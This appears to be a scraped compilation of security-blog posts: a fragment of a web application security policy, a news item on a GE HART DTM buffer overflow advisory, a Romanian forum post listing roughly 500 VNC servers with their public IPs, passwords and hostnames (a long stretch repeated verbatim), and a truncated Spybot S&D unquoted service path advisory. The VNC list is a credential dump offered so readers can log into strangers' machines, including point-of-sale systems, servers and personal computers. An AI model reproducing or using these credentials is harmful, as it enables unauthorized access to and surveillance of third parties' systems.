with a disciplinary action such as termination of employment, depending on the nature of violation. Everyone accessing web applications should undergo assessment as a requirement of a security policy and adhere to the policy unless exempted in certain circumstances. The infrastructure of all applications should be updated to include the security control process. Any web applications that lack appropriate security controls should be taken down for formal assessment, and should not make their way online until the CIO clears them for security integration. All these measures will result in business benefits, such as no loss of productivity during downtimes, and ensure SLAs are met. An enterprise with highly secured web applications will also attract more clients, as they would be better able to protect sensitive customer information. Organizations following the security policy template would also enjoy technical benefits such as high availability and security of data. Both these factors are likely to improve client-wide and industry wide reputation. Lastly, the policy will bridge the gap between good IT practices and enterprise security compliance. Source

GE has released a fix for a vulnerability in a library that’s used in several of its products deployed in critical infrastructure areas. The flaw in the HART Device Type Manager library could allow an attacker to crash affected applications or run arbitrary code. The vulnerability in the DTM library affects four of GE’s products, as well as one product manufactured by MACTek. According to an advisory from ICS-CERT, GE has released an updated library that addresses the problem. “The vulnerability causes a buffer overflow in the HART Device DTM crashing the Field Device Tool (FDT) Frame Application. The Frame Application must then be restarted. The Frame Application is primarily used for remote configuration. Exploitation of this vulnerability does not result in loss of information, control, or view by the control system of the HART devices on the 4-20 mA HART Loop,” the advisory says. “The buffer overflow exploited could be used to execute arbitrary code on the system running the Frame Application. The researcher has provided proof of concept to ICS-CERT and the vendor. The updated HART Device DTM provided by the GE and MACTek will resolve this issue. Successful exploitation requires that the Frame Application is running and connected to a DTM?configured HART?based device at the time of the exploit.” The new library that fixes the vulnerability is available from GE and MACTek both. The affected products are: MACTek’s Bullet DTM 1.00.0, GE’s Vector DTM 1.00.0, GE’s SVi1000 Positioner DTM 1.00.0, GE’s SVI II AP Positioner DTM 2.00.1, and GE’s 12400 Level Transmitter DTM 1.00.0. Until customers have patched their affected products, ICS-CERT recommends some additional mitigations. “Device DTM software with the identified vulnerable versions listed as impacted should be used only within an offline secure network until patched. ICS-CERT strongly recommends performing configuration changes in a nonproduction environment where proper testing and risk evaluation can be performed. ICS-CERT also recommends that asset owners employ a least privilege practice and avoid unnecessary services within their production environment,” the advisory says. Source

Sunt vreo 500 la numar, cred ca gasiti ceva bun p'acolo. Am sa va mai postez, cel putin odata pe saptamana. Hai sariti sa va puneti redirecturile ca stiu ca asta faceti . Ma-ti terorizat cu ele, cum le vad cum le sterg... . 2.109.240.90:5900-null-[None] 112.216.248.234:5900-1-[qq4ero7hd8sv6] 177.21.110.10:5900-1234-[None] 177.21.52.62:5900-123456-[cameras ( 192.168.13.1 ) - application mode] 112.7.121.152:5900-1-[pc-201304141208] 112.16.76.193:5900-null-[installer@installer-desktop] 112.16.93.13:5900-null-[1570020POS99] 112.2.50.149:5900-password-[110301188-01] 112.2.12.21:5900-password-[110301188-01] 112.2.50.170:5900-password-[110301188-01] 112.2.55.194:5900-password-[110301188-01] 112.2.50.188:5900-password-[110301188-01] 112.2.49.27:5900-password-[110301188-01] 121.34.251.19:5900-null-[None] 121.34.124.66:5900-1-[2014_2015jthssm] 121.44.114.7:5900-1-[None] 121.67.212.16:5900-null-[None] 121.67.212.27:5900-null-[None] 121.67.212.76:5900-null-[None] 121.67.212.70:5900-null-[None] 121.67.212.11:5900-null-[None] 121.67.212.12:5900-null-[None] 121.67.212.71:5900-null-[None] 121.67.212.77:5900-null-[None] 121.67.212.73:5900-null-[None] 121.67.212.72:5900-null-[None] 121.67.212.42:5900-null-[None] 121.67.212.30:5900-null-[None] 121.67.212.23:5900-null-[None] 121.67.212.17:5900-null-[None] 121.67.212.13:5900-null-[None] 121.67.212.22:5900-null-[None] 121.67.212.15:5900-null-[None] 121.67.212.54:5900-null-[None] 121.67.212.41:5900-null-[None] 121.67.212.40:5900-null-[None] 121.67.212.69:5900-null-[None] 121.67.212.28:5900-null-[None] 121.67.212.47:5900-null-[None] 121.67.212.53:5900-null-[None] 121.67.212.32:5900-null-[None] 121.67.212.37:5900-null-[None] 121.67.212.26:5900-null-[None] 121.66.39.21:5900-null-[None] 121.67.212.55:5900-null-[None] 121.67.212.57:5900-null-[None] 121.67.212.62:5900-null-[None] 121.67.212.79:5900-null-[None] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.7.3.19:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 121.66.38.203:5900-1234-[nvr28:0] 121.12.167.104:5900-123456-[OTHER] 121.53.51.134:5900-123456-[mvodtown:0] 121.67.62.28:5900-12345678-[None] 121.67.62.25:5900-12345678-[None] 121.67.62.14:5900-12345678-[pc014] 121.67.62.24:5900-12345678-[None] 121.67.62.18:5900-12345678-[None] 121.67.62.22:5900-12345678-[None] 211.2.26.47:5900-passwd-[yuichi-macmini] 121.67.212.35:5900-null-[None] 110.5.17.67:5900-null-[oruser@ubuntu12-04] 110.20.229.51:5900-null-[BJE-CP1:0.0] 110.10.133.206:5900-null-[None] 110.10.133.204:5900-null-[None] 110.10.133.191:5900-null-[None] 110.10.133.133:5900-null-[None] 110.10.133.135:5900-null-[None] 110.10.133.134:5900-null-[None] 110.6.191.205:5900-admin123-[2012-20110101gg ( 110.6.191.205, 172.22.169.1, 169.254.131.242 )] 110.15.211.98:5900-0000-[pm06 ( 110.15.211.98 ) - application mode] 110.10.133.202:5900-null-[None] 110.10.133.176:5900-null-[None] 154.127.117.82:5900-1-[None] 117.172.163.200:5900-123-[PC-201204091653] 123.242.169.245:5900-123-[i01068] 123.242.156.6:5900-123456-[None] 88.2.196.195:5900-null-[None] 88.0.247.182:5900-null-[Cubie:0.0] 88.2.235.169:5900-null-[None] 88.5.23.112:5900-null-[QEMU] 88.12.13.187:5900-null-[Device 10001] 88.12.5.96:5900-null-[Device 10001] 88.12.44.45:5900-null-[Device 10001] 88.12.152.95:5900-null-[QEMU] 46.229.153.82:5900-null-[x11] 88.14.143.89:5900-null-[FORMACION3] 88.14.100.165:5900-null-[QEMU] 88.14.111.235:5900-null-[QEMU] 88.14.121.18:5900-null-[QEMU] 79.143.179.236:5900-null-[QEMU (static-farmmania)] 37.123.140.247:5900-null-[None] 78.70.20.118:5900-null-[x11] 37.123.141.88:5900-null-[None] 78.70.192.224:5900-null-[None] 37.123.186.100:5900-null-[None] 130.237.67.12:5900-null-[bajibabu@fant] 88.7.75.115:5900-null-[bfa@MicroServer] 79.143.161.228:5900-null-[tuco@dnevna] 212.116.80.42:5900-null-[None] 85.30.34.137:5900-null-[None] 85.30.55.0:5900-null-[None] 85.30.60.206:5900-null-[None] 85.30.154.152:5900-null-[None] 85.30.155.162:5900-null-[None] 213.66.136.156:5900-null-[None] 213.66.136.32:5900-null-[None] 85.30.57.208:5900-null-[None] 193.13.110.248:5900-null-[None] 193.13.36.238:5900-null-[None] 195.19.76.233:5900-null-[QEMU (rosabs3-abf-worker1)] 178.78.60.68:5900-1-[rk7server ( 192.168.0.99 ) - service mode] 5.133.132.127:5900-1-[None] 130.237.25.250:5900-null-[None] 121.8.202.84:5900-1-[gdeie1703160] 121.6.151.139:5900-1-[nlbugis-pc ( 192.168.1.100 )] 121.12.120.72:5900-null-[QEMU (we5dg)] 121.14.195.68:5900-null-[Xen-cms] 121.1.198.99:5900-null-[wavecast@wavecast-01] 128.2.90.39:5900-null-[None] 128.2.144.215:5900-null-[student@kali1] 128.2.144.136:5900-null-[student@kali1] 128.2.144.139:5900-null-[student@kali1] 128.2.144.138:5900-null-[student@kali1] 128.2.144.140:5900-null-[student@kali1] 128.6.17.244:5900-null-[Device 10002] 128.9.233.14:5900-null-[QEMU (instance-00000422)] 128.9.233.16:5900-null-[QEMU (instance-000000b5)] 128.9.233.18:5900-null-[QEMU (instance-000000b3)] 128.9.233.11:5900-null-[QEMU (instance-00000423)] 128.9.233.13:5900-null-[QEMU (instance-00000426)] 128.9.233.12:5900-null-[QEMU (instance-0000029b)] 128.2.214.34:5900-null-[None] 128.2.245.163:5900-null-[None] 128.2.245.165:5900-null-[None] 128.2.245.161:5900-null-[None] 128.6.17.243:5900-null-[None] 128.2.144.135:5900-null-[student@kali1] 88.12.42.82:5900-123-[DEHESASERVER] 187.58.122.9:5900-123-[svr01 ( 192.168.25.201 ) - service mode] 95.31.221.127:5900-123-[guestmsk] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.13.219.5:5900-123-[cpo-mis-5815] 95.31.137.96:5900-123-[maksimov@x01-policase-prod] 121.17.52.72:5900-123-[pc-20100901yzle] 88.2.222.98:5900-1234-[None] 88.3.119.122:5900-1234-[None] 78.70.14.226:5900-1234-[EXTER T40m] 5.228.58.178:5900-1234-[None] 121.6.181.205:5900-1234-[mah_pms ( 192.168.22.4 ) - application mode] 121.7.152.30:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 88.12.48.199:5900-12345-[WinVNC] 88.10.113.245:5900-12345-[Minerva Mac Server] 130.236.136.28:5900-12345-[None] 187.58.126.213:5900-12345-[SERVIDOR Microsoft Windows Server 2003 R2, Enterprise Edition Service Pack 2 (build 3790)] 128.8.138.146:5900-12345-[Julie Berry’s iMac] 212.116.173.41:5900-123456-[None] 212.116.173.42:5900-123456-[None] 81.200.27.43:5900-123456-[Encelad] 121.12.167.104:5900-123456-[OTHER] 107.6.13.189:5900-123456-[QEMU (WIN)] 107.6.44.202:5900-123456-[win-62fghkhguos ( 10.10.20.6, 107.6.44.202, 169.254.235.96 ) - service mode] 88.11.135.233:5900-12345678-[DVR [000322091864]] 121.6.146.222:5900-12345678-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 121.6.146.222:5900-1234567890-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 116.88.94.171:5900-0000-[server’s Mac mini] 95.215.99.206:5900-0000-[LKDS-ÏÊ] 79.143.81.46:5900-q1w2e3-[None] 88.0.26.187:5900-qwerty123-[svrppv ( 192.168.31.1 )] 88.5.181.31:5900-qwerty123-[srvppv ( 192.168.1.2, 192.168.25.60, 192.168.25.61 ) - service mode] 88.3.164.90:5900-qwerty123-[svrppv ( 192.168.17.1 )] 88.11.80.10:5900-qwerty123-[svrppv ( 192.168.37.1 )] 88.13.1.162:5900-qwerty123-[svrppv ( 192.168.10.1 )] 88.13.4.146:5900-qwerty123-[svrppv ( 192.168.28.1 )] 88.13.73.144:5900-qwerty123-[svrppv ( 192.168.60.1 )] 88.13.9.8:5900-qwerty123-[svrppv ( 192.168.18.2 )] 88.13.52.137:5900-qwerty123-[svrppv ( 192.168.13.1 )] 88.12.67.68:5900-qwerty123-[svrppv ( 192.168.25.1 )] 88.13.3.176:5900-qwerty123-[svrppv ( 192.168.61.2 )] 88.3.162.166:5900-qwerty123-[None] 88.13.62.54:5900-remote-[compaq] 128.2.75.121:5900-test-[Jim Hawthorne’s iMac] 121.7.222.155:5900-support-[None] 88.12.54.153:5900-master-[VC Project 'visu'] 107.6.13.71:5900-abc123-[QEMU (1066-eh-web1)] 121.1.254.150:5900-null-[192.168.0.190 ] 52.16.163.163:5900-null-[None] 52.16.142.254:5900-null-[nobody's x11 desktop (linerishana:1)] 52.16.170.223:5900-null-[amazona-c323d46] 52.1.226.14:5900-null-[None] 52.10.10.17:5900-null-[None] 24.13.243.196:5900-null-[exercise] 24.15.192.124:5900-null-[art@Ubu] 24.4.40.162:5900-1-[David’s iMac] 24.9.52.142:5900-null-[user@user-Dimension-4550] 81.7.10.87:5900-null-[QEMU (vmcentos7)] 81.7.122.3:5900-null-[www - VirtualBox] 81.9.153.58:5900-null-[x11] 81.12.145.216:5900-null-[D42L7H3J] 81.10.106.106:5900-null-[PACSSHOBAN] 24.9.167.171:5900-null-[None] 81.24.131.251:5900-null-[Qt for Embedded Linux VNC Server] 81.30.158.229:5900-null-[x11] 81.33.27.109:5900-null-[Device 10001] 81.33.102.60:5900-null-[Device 10001] 81.35.177.104:5900-null-[QEMU] 81.36.24.96:5900-null-[QEMU] 81.29.252.196:5900-1-[alborz-ics ( 10.51.222.171, 10.60.4.235, 81.29.252.196, 192.168.231.10 ) - service mode] 81.44.43.134:5900-null-[OEM-MAMTWY7H6GU] 81.52.169.18:5900-null-[SERVERTEC] 81.65.55.235:5900-null-[KVM-SERVEUR] 81.82.77.131:5900-null-[None] 81.33.25.134:5900-null-[None] 81.83.6.135:5900-null-[x11] 81.57.207.3:5900-null-[skyangeli@vDebian] 81.84.120.41:5900-null-[root's x11 desktop (VVServer:0)] 81.89.12.66:5900-null-[QEMU (instance-00000043)] 81.102.83.136:5900-null-[donald@ubuntu] 81.109.37.232:5900-null-[OEM-OASBVV2TX75] 81.133.6.182:5900-null-[hulk:0] 81.133.219.45:5900-null-[None] 81.134.14.139:5900-null-[TP] 81.135.94.240:5900-null-[root's x11 desktop (ExzaRaspberry:1)] 81.136.246.106:5900-null-[E1101] 81.138.38.34:5900-null-[R6_01:0] 81.138.38.45:5900-null-[R5_01:0] 81.133.113.92:5900-null-[None] 81.138.237.173:5900-null-[DPFTP] 81.140.69.34:5900-null-[IGEL-00E0C5101D25:0] 81.155.232.251:5900-null-[Cinema] 81.164.56.75:5900-null-[WindowsCE] 81.149.198.21:5900-null-[clarks@clarks-PowerEdge-T300] 81.149.200.232:5900-null-[attainserver@attainserver-M68MT-S2] 81.170.151.207:5900-null-[None] 81.170.189.171:5900-null-[None] 81.151.50.143:5900-null-[henryg@zoom-mint1] 81.169.245.238:5900-null-[QEMU (fw)] 81.170.252.54:5900-null-[None] 81.170.178.57:5900-null-[None] 81.174.49.178:5900-null-[perla:0.0] 81.173.145.34:5900-null-[martin@ubuntu-buddah] 81.169.209.226:5900-null-[None] 81.175.160.82:5900-null-[x11] 81.175.147.175:5900-null-[QEMU (ubuntu-dev)] 81.175.165.92:5900-null-[x11] 81.153.21.181:5900-null-[None] 81.158.180.254:5900-null-[None] 81.174.15.163:5900-null-[desknow@00-DESKNOW] 81.183.193.131:5900-null-[x11] 81.183.216.30:5900-null-[Win XP Prof ALU] 81.170.69.64:5900-null-[plex@plex] 81.186.253.166:5900-null-[None] 81.184.220.147:5900-null-[VNC server via dispmanx] 81.184.247.54:5900-null-[marcoslinux:0] 81.174.37.50:5900-1-[None] 81.193.145.161:5900-null-[root's x11 desktop (VVServer:0)] 81.190.144.40:5900-1-[kasa ( 192.168.1.101 ) - service mode] 81.187.202.12:5900-null-[PADPLOTTER3] 81.196.109.68:5900-null-[QEMU (virt_admin)] 81.192.114.67:5900-null-[root@localhost.localdomain] 81.198.121.165:5900-null-[None] 81.201.57.152:5900-null-[None] 81.180.115.84:5900-null-[None] 81.206.168.44:5900-1-[x0vncserver] 81.209.111.52:5900-null-[x11] 81.209.112.165:5900-null-[x11] 81.210.113.130:5900-null-[None] 81.214.131.128:5900-null-[CATI] 81.218.162.69:5900-null-[Touch3G ] 81.198.84.242:5900-null-[administrator@administrator] 81.218.133.159:5900-null-[None] 81.215.200.69:5900-1-[FOREX] 81.222.88.198:5900-null-[QEMU (instance-000000c9)] 81.224.45.141:5900-null-[None] 81.219.27.68:5900-1-[supermarket ( 192.168.1.3 ) - service mode] 81.224.115.90:5900-null-[None] 81.225.48.235:5900-null-[None] 81.224.98.167:5900-null-[None] 81.225.19.126:5900-null-[None] 81.226.48.241:5900-null-[None] 81.227.16.231:5900-null-[None] 81.227.11.133:5900-null-[None] 81.227.35.212:5900-null-[None] 81.227.35.132:5900-null-[None] 81.224.135.60:5900-null-[None] 81.227.19.175:5900-null-[None] 81.227.36.131:5900-null-[None] 81.227.25.75:5900-null-[None] 81.196.98.235:5900-null-[None] 81.228.39.216:5900-null-[iX T10A] 81.229.48.225:5900-null-[None] 81.228.198.158:5900-null-[None] 81.231.164.234:5900-null-[E1070] 81.231.250.98:5900-null-[None] 81.231.104.217:5900-null-[None] 81.231.238.149:5900-null-[None] 81.232.19.148:5900-null-[E1070] 81.233.67.172:5900-null-[None] 81.233.152.54:5900-null-[None] 81.233.185.249:5900-null-[None] 81.233.178.19:5900-null-[None] 81.234.21.221:5900-null-[None] 81.233.255.165:5900-null-[E1032] 81.234.151.82:5900-null-[None] 81.235.131.41:5900-null-[None] 81.234.151.231:5900-null-[E1101] 81.235.206.92:5900-null-[None] 81.236.20.208:5900-null-[None] 81.236.210.216:5900-null-[None] 81.236.223.2:5900-null-[E1071] 81.236.217.233:5900-null-[None] 81.236.223.47:5900-null-[E1071] 81.205.181.92:5900-null-[None] 81.236.212.182:5900-null-[monlserv1:0] 81.217.199.131:5900-null-[None] 81.246.0.10:5900-null-[None] 81.248.75.21:5900-null-[None] 81.248.249.227:5900-null-[pop@201107455] 81.47.172.253:5900-12-[NCIS] 81.88.233.130:5900-12-[None] 81.171.155.42:5900-null-[QEMU (oVirtm)] 81.227.46.52:5900-null-[None] 81.236.254.106:5900-null-[None] 81.237.238.231:5900-null-[None] 81.10.2.210:5900-123-[None] 81.10.2.212:5900-123-[None] 81.22.204.192:5900-123-[WPRTA0040022] 81.59.2.90:5900-123-[x0vncserver] 81.137.245.179:5900-123-[None] 81.195.75.60:5900-123-[avto@avto] 81.237.222.113:5900-null-[None] 24.20.196.118:5900-1234-[your-92c71f85fb] 81.9.132.21:5900-1234-[iService Gestión] 81.15.224.218:5900-1234-[None] 81.43.98.123:5900-1234-[Adhoc MiniServer] 81.45.86.124:5900-1234-[server-tau ( 172.26.0.151 ) - service mode] 81.56.234.183:5900-1234-[EXTER T100] 81.56.198.245:5900-1234-[T12B] 81.57.125.74:5900-1234-[NOM-63E6AC54477] 81.88.239.5:5900-1234-[x0vncserver] 81.88.252.60:5900-1234-[x0vncserver] 81.88.252.120:5900-1234-[x0vncserver] 81.110.54.58:5900-1234-[Bryan’s Mac mini] 81.136.131.200:5900-1234-[ht5 ( 192.168.1.9 ) - service mode] 81.136.222.63:5900-1234-[E1061] 81.137.217.146:5900-1234-[kensington ( 192.168.1.98 ) - service mode] 81.139.177.145:5900-1234-[OSX-XSERVE-01] 81.174.3.2:5900-1234-[WinVNC] 81.174.140.197:5900-1234-[server ( 192.168.59.10 )] 81.149.231.78:5900-1234-[None] 81.182.75.133:5900-1234-[WLGHUN10-BPHUB3] 81.182.207.102:5900-1234-[WLGHUN10-BPHUT4] 81.192.101.124:5900-1234-[BUR140] 81.192.101.15:5900-1234-[BUR006] 81.218.191.1:5900-1234-[None] 81.218.152.62:5900-1234-[king@king-desktop] 81.235.158.185:5900-1234-[E1071] 81.245.51.62:5900-1234-[None] 81.246.250.200:5900-1234-[titanium ( 192.168.1.100 )] 81.248.174.88:5900-1234-[cvabym01 ( 192.168.1.11 )] 81.249.169.249:5900-1234-[GIGA4] 52.16.95.150:5900-12345-[None] 52.0.57.238:5900-12345-[IP-C0A898FD Microsoft Windows Server 2008 R2 Datacenter Edition Service Pack 1 (build 7601), 64-bit] 81.4.234.218:5900-12345-[borodulin’s Mac mini] 81.18.192.178:5900-12345-[MININT-9EE8VS5 Microsoft Windows 7 Professional Service Pack 1 (build 7601), 64-bit] 81.10.237.109:5900-12345-[Martins Mac mini] 81.136.247.116:5900-12345-[evigilo12337] 81.142.114.213:5900-12345-[NoiseMonitoringServer’s Mac mini] 81.142.114.208:5900-12345-[None] 81.142.114.211:5900-12345-[None] 81.142.114.209:5900-12345-[None] 81.142.114.214:5900-12345-[None] 81.142.114.215:5900-12345-[None] 81.142.114.210:5900-12345-[None] 81.142.114.212:5900-12345-[None] 81.219.141.230:5900-12345-[SRV-SB-WIESZ] 81.218.123.30:5900-12345-[apollo] 52.10.12.25:5900-123456-[WIN-LESQVADBMRU] 81.34.214.83:5900-123456-[DLR4-16 [000322120f40]] 81.44.68.7:5900-123456-[tpv004 ( 192.168.1.100 )] 81.82.240.218:5900-123456-[hpz220 ( 192.168.0.102 ) - service mode] 81.133.189.12:5900-123456-[aboutface1 ( 192.168.1.1 )] 81.153.186.122:5900-123456-[ucs160310] 81.200.27.43:5900-123456-[Encelad] 81.169.142.199:5900-1234567-[h2318994 ( 81.169.142.199 ) - service mode] 81.192.48.243:5900-null-[None] 81.32.168.98:5900-12345678-[DLR-2116 [000322162fbd]] 81.95.137.206:5900-12345678-[lift2 ( 81.95.137.206, 192.168.0.189 ) - service mode] 81.177.224.140:5900-12345678-[manager ( 192.168.0.108 ) - service mode] 81.182.26.218:5900-1234567890-[gertasrv ( 192.168.1.190 )] 81.253.43.3:5900-1234567890-[portable-or ( 172.17.105.170 )] 81.106.220.146:5900-password1-[James’s iMac] 81.80.209.132:5900-password1-[None] 81.140.83.142:5900-password1-[WinCEVNC] 81.142.228.102:5900-password1-[None] 81.149.26.104:5900-password1-[sqlserver ( 192.168.10.99 )] 81.174.169.5:5900-password1-[E1151] 81.193.157.38:5900-password1-[None] 81.255.31.88:5900-password1-[pc-de-stasdd ( 192.168.1.13 ) - service mode] 81.149.214.214:5900-password01-[2KSERVER] 81.211.17.70:5900-pass1-[VEEX V300 Series VNC Server] 81.30.136.215:5900-admin-[kasa ( 192.168.0.10 ) - service mode] 81.83.30.223:5900-admin-[Fileserver] 81.93.249.190:5900-admin-[OM20-81-93-249-190] 81.143.8.77:5900-admin-[Turtle’s Mac mini] 81.174.14.107:5900-admin-[casartelli-pc ( 192.58.3.235, 192.58.4.235 ) - service mode] 81.82.224.41:5900-P@ssword-[None] 81.82.237.60:5900-P@ssword-[veeam] 81.83.0.152:5900-P@ssword-[backup] 81.133.161.166:5900-P@ssword-[None] 81.240.252.89:5900-P@ssword-[None] 81.38.161.168:5900-qwerty123-[svrppv ( 192.168.30.2 )] 81.44.45.176:5900-qwerty123-[svrppv ( 192.168.34.2 )] 81.168.172.172:5900-qwerty-[mar-f370d6790f8 ( 192.168.240.99 )] 81.148.17.41:5900-remote-[Mark’s iMac] 81.168.90.243:5900-remote-[None] 81.203.6.253:5900-system-[altillo ( 192.168.1.11 ) - service mode] 24.29.173.112:5900-null-[eve@eve-1005HA] 24.24.26.118:5900-test-[headsup1] 81.83.13.201:5900-test-[xserve] 81.137.254.231:5900-hello123-[elleeshd1 ( 192.168.1.95 ) - service mode] 81.233.79.15:5900-support-[81-233-79-15-no73.business.telia.com:0] 81.233.79.192:5900-support-[81-233-79-192-no73.business.telia.com:0] 81.27.123.4:5900-master-[VC Project 'visu'] 81.43.111.240:5900-master-[VC Project 'visu'] 81.137.235.204:5900-master-[VC Project 'visu'] 81.159.79.102:5900-master-[BR06] 81.164.186.182:5900-master-[BR06] 81.169.139.211:5900-master-[VC Project 'visu'] 81.174.239.18:5900-master-[BR06] 81.174.239.19:5900-master-[BR06] 81.174.228.65:5900-master-[VC Project 'visu'] 81.243.240.92:5900-master-[VC Project 'visu'] 81.242.239.84:5900-master-[VC Project 'visu'] 81.245.232.82:5900-master-[VC Project 'visu'] 81.245.62.40:5900-master-[BR06] 81.246.204.78:5900-master-[BR06] 81.152.195.110:5900-letmein-[nigel@MUSIC] 81.82.234.116:5900-null-[None] 24.8.213.188:5900-apple-[17inch] 81.26.152.173:5900-111111-[ulu ( 10.10.0.175, 10.10.0.60, 81.26.152.173 ) - service mode] 81.82.240.39:5900-111111-[x0vncserver] 81.133.215.254:5900-111111-[T7A] 81.137.202.219:5900-pa55word-[macmini server] 81.174.165.102:5900-pa55word-[Colophon Server] 81.234.254.138:5900-null-[None] 88.2.196.195:5900-null-[None] 88.0.247.182:5900-null-[Cubie:0.0] 88.2.235.169:5900-null-[None] 88.5.23.112:5900-null-[QEMU] 88.12.13.187:5900-null-[Device 10001] 88.12.5.96:5900-null-[Device 10001] 88.12.44.45:5900-null-[Device 10001] 88.12.152.95:5900-null-[QEMU] 46.229.153.82:5900-null-[x11] 88.14.143.89:5900-null-[FORMACION3] 88.14.100.165:5900-null-[QEMU] 88.14.111.235:5900-null-[QEMU] 88.14.121.18:5900-null-[QEMU] 79.143.179.236:5900-null-[QEMU (static-farmmania)] 37.123.140.247:5900-null-[None] 78.70.20.118:5900-null-[x11] 37.123.141.88:5900-null-[None] 78.70.192.224:5900-null-[None] 37.123.186.100:5900-null-[None] 130.237.67.12:5900-null-[bajibabu@fant] 88.7.75.115:5900-null-[bfa@MicroServer] 79.143.161.228:5900-null-[tuco@dnevna] 212.116.80.42:5900-null-[None] 85.30.34.137:5900-null-[None] 85.30.55.0:5900-null-[None] 85.30.60.206:5900-null-[None] 85.30.154.152:5900-null-[None] 85.30.155.162:5900-null-[None] 213.66.136.156:5900-null-[None] 213.66.136.32:5900-null-[None] 85.30.57.208:5900-null-[None] 193.13.110.248:5900-null-[None] 193.13.36.238:5900-null-[None] 195.19.76.233:5900-null-[QEMU (rosabs3-abf-worker1)] 178.78.60.68:5900-1-[rk7server ( 192.168.0.99 ) - service mode] 5.133.132.127:5900-1-[None] 130.237.25.250:5900-null-[None] 121.8.202.84:5900-1-[gdeie1703160] 121.6.151.139:5900-1-[nlbugis-pc ( 192.168.1.100 )] 121.12.120.72:5900-null-[QEMU (we5dg)] 121.14.195.68:5900-null-[Xen-cms] 121.1.198.99:5900-null-[wavecast@wavecast-01] 128.2.90.39:5900-null-[None] 128.2.144.215:5900-null-[student@kali1] 128.2.144.136:5900-null-[student@kali1] 128.2.144.139:5900-null-[student@kali1] 128.2.144.138:5900-null-[student@kali1] 128.2.144.140:5900-null-[student@kali1] 128.6.17.244:5900-null-[Device 10002] 128.9.233.14:5900-null-[QEMU (instance-00000422)] 128.9.233.16:5900-null-[QEMU (instance-000000b5)] 128.9.233.18:5900-null-[QEMU (instance-000000b3)] 128.9.233.11:5900-null-[QEMU (instance-00000423)] 128.9.233.13:5900-null-[QEMU (instance-00000426)] 128.9.233.12:5900-null-[QEMU (instance-0000029b)] 128.2.214.34:5900-null-[None] 128.2.245.163:5900-null-[None] 128.2.245.165:5900-null-[None] 128.2.245.161:5900-null-[None] 128.6.17.243:5900-null-[None] 128.2.144.135:5900-null-[student@kali1] 88.12.42.82:5900-123-[DEHESASERVER] 187.58.122.9:5900-123-[svr01 ( 192.168.25.201 ) - service mode] 95.31.221.127:5900-123-[guestmsk] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.13.219.5:5900-123-[cpo-mis-5815] 95.31.137.96:5900-123-[maksimov@x01-policase-prod] 121.17.52.72:5900-123-[pc-20100901yzle] 88.2.222.98:5900-1234-[None] 88.3.119.122:5900-1234-[None] 78.70.14.226:5900-1234-[EXTER T40m] 5.228.58.178:5900-1234-[None] 121.6.181.205:5900-1234-[mah_pms ( 192.168.22.4 ) - application mode] 121.7.152.30:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 88.12.48.199:5900-12345-[WinVNC] 88.10.113.245:5900-12345-[Minerva Mac Server] 130.236.136.28:5900-12345-[None] 187.58.126.213:5900-12345-[SERVIDOR Microsoft Windows Server 2003 R2, Enterprise Edition Service Pack 2 (build 3790)] 128.8.138.146:5900-12345-[Julie Berry’s iMac] 212.116.173.41:5900-123456-[None] 212.116.173.42:5900-123456-[None] 81.200.27.43:5900-123456-[Encelad] 121.12.167.104:5900-123456-[OTHER] 107.6.13.189:5900-123456-[QEMU (WIN)] 107.6.44.202:5900-123456-[win-62fghkhguos ( 10.10.20.6, 107.6.44.202, 169.254.235.96 ) - service mode] 88.11.135.233:5900-12345678-[DVR [000322091864]] 121.6.146.222:5900-12345678-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 121.6.146.222:5900-1234567890-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 116.88.94.171:5900-0000-[server’s Mac mini] 95.215.99.206:5900-0000-[LKDS-ÏÊ] 79.143.81.46:5900-q1w2e3-[None] 88.0.26.187:5900-qwerty123-[svrppv ( 192.168.31.1 )] 88.5.181.31:5900-qwerty123-[srvppv ( 192.168.1.2, 192.168.25.60, 192.168.25.61 ) - service mode] 88.3.164.90:5900-qwerty123-[svrppv ( 192.168.17.1 )] 88.11.80.10:5900-qwerty123-[svrppv ( 192.168.37.1 )] 88.13.1.162:5900-qwerty123-[svrppv ( 192.168.10.1 )] 88.13.4.146:5900-qwerty123-[svrppv ( 192.168.28.1 )] 88.13.73.144:5900-qwerty123-[svrppv ( 192.168.60.1 )] 88.13.9.8:5900-qwerty123-[svrppv ( 192.168.18.2 )] 88.13.52.137:5900-qwerty123-[svrppv ( 192.168.13.1 )] 88.12.67.68:5900-qwerty123-[svrppv ( 192.168.25.1 )] 88.13.3.176:5900-qwerty123-[svrppv ( 192.168.61.2 )] 88.3.162.166:5900-qwerty123-[None] 88.13.62.54:5900-remote-[compaq] 128.2.75.121:5900-test-[Jim Hawthorne’s iMac] 121.7.222.155:5900-support-[None] 88.12.54.153:5900-master-[VC Project 'visu'] 107.6.13.71:5900-abc123-[QEMU (1066-eh-web1)]

Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation Vendor: Safer-Networking Ltd. Product web page: http://www.safer-networking.org Affected version: 1.6.2 Summary: Spybot – Search & Destroy (S&D) is a spyware and adware removal computer program compatible with Microsoft Windows 95 and later. It scans the computer hard disk and/or RAM for malicious software. Desc: The application suffers from an unquoted search path issue impacting the service 'SBSDWSCService' for Windows deployed as part of Spybot S&D. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. Tested on: Microsoft Windows Ultimate 7 SP1 (EN) Vulnerability discovered by Aljaz Ceru aljaz@insec.si Advisory ID: ZSL-2015-5237 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5237.php 17.02.2015 --- C:\Users\user>sc qc SBSDWSCService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SBSDWSCService 